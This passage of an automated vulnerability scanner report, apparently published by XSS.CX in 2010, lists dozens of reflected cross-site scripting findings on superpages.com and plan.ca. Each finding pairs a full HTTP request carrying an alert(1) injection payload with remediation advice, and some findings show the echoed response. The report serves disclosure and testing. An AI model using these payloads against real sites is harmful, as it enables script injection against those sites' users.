This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsc0e73"-alert(1)-"1ba684b4574/js/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12d5a"-alert(1)-"3b591ccf4d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js12d5a"-alert(1)-"3b591ccf4d7/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b30"-alert(1)-"e73a333b107 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.jsb0b30"-alert(1)-"e73a333b107 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9fe9"-alert(1)-"0f246252d00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsf9fe9"-alert(1)-"0f246252d00/js/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8721d"-alert(1)-"1a2eb664b53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js8721d"-alert(1)-"1a2eb664b53/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eebf5"-alert(1)-"2efa033de7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.jseebf5"-alert(1)-"2efa033de7f HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f80"-alert(1)-"90b025b4504 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews54f80"-alert(1)-"90b025b4504/js/toggle.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687c5"-alert(1)-"82327248272 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js687c5"-alert(1)-"82327248272/toggle.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c60e4"-alert(1)-"09d055d1773 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/toggle.jsc60e4"-alert(1)-"09d055d1773 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 784a5"-alert(1)-"ea9d8c74217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews784a5"-alert(1)-"ea9d8c74217/js/toggleVote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27727"-alert(1)-"d8ab575fbc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js27727"-alert(1)-"d8ab575fbc0/toggleVote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c2d"-alert(1)-"a73761957a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/toggleVote.js99c2d"-alert(1)-"a73761957a3 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb22"-alert(1)-"30b48493143 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seedb22"-alert(1)-"30b48493143/compositepage.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 986e7"-alert(1)-"fcdd42f96e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css986e7"-alert(1)-"fcdd42f96e9 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b34e3"-alert(1)-"1c02757a631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypb34e3"-alert(1)-"1c02757a631/js/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 614f1"-alert(1)-"b4d7becfeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js614f1"-alert(1)-"b4d7becfeb/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feaa1"-alert(1)-"6db04b2d2d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jsfeaa1"-alert(1)-"6db04b2d2d1 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7c01"-alert(1)-"7f08965b314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypd7c01"-alert(1)-"7f08965b314/js/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a47ac"-alert(1)-"23df84e8480 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa47ac"-alert(1)-"23df84e8480/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 909ce"-alert(1)-"f8dafda782f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.js909ce"-alert(1)-"f8dafda782f HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7992"-alert(1)-"6017094ff29 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htm HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e7992"-alert(1)-"6017094ff29 Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1292727571684-www.superpages.com-13613288-39116; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:31 GMT; Path=/ Set-Cookie: JSESSIONID=ED506B1A806306616FE23BFBC1073621; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 104307 Date: Sun, 19 Dec 2010 02:59:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ecipient = "90Xu4uH6NFYK+Iqqk6+FeVzLlkKzW8jB6WlHIphJxlnVm1sNDSH6xA=="; var remote_add = "REMOTE_ADDR=174.121.222.18"; var http_user = "HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e7992"-alert(1)-"6017094ff29"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '0122 ...[SNIP]...
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c254"><script>alert(1)</script>2a8eaab5b62 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found Date: Sun, 19 Dec 2010 03:04:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: https://www.plan.ca/registration/index.cfm?action=ForgetPasswordForm3c254"><script>alert(1)</script>2a8eaab5b62 Content-Length: 297 Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1><p>The document has moved <a href="https://www.plan.ca/registration/index.cfm?action=ForgetPasswordForm3c254"><script>alert(1)</script>2a8eaab5b62"> ...[SNIP]...
1.495. http://www.plan.ca/registration/index.cfm [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.plan.ca
Path:
/registration/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497b1"><script>alert(1)</script>4529f8791d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found Date: Sat, 18 Dec 2010 23:26:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: https://www.plan.ca/registration/index.cfm?497b1"><script>alert(1)</script>4529f8791d4=1 Content-Length: 274 Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1><p>The document has moved <a href="https://www.plan.ca/registration/index.cfm?497b1"><script>alert(1)</script>4529f8791d4=1"> ...[SNIP]...
Report generated by XSS.CX at Sun Dec 19 07:08:47 CST 2010.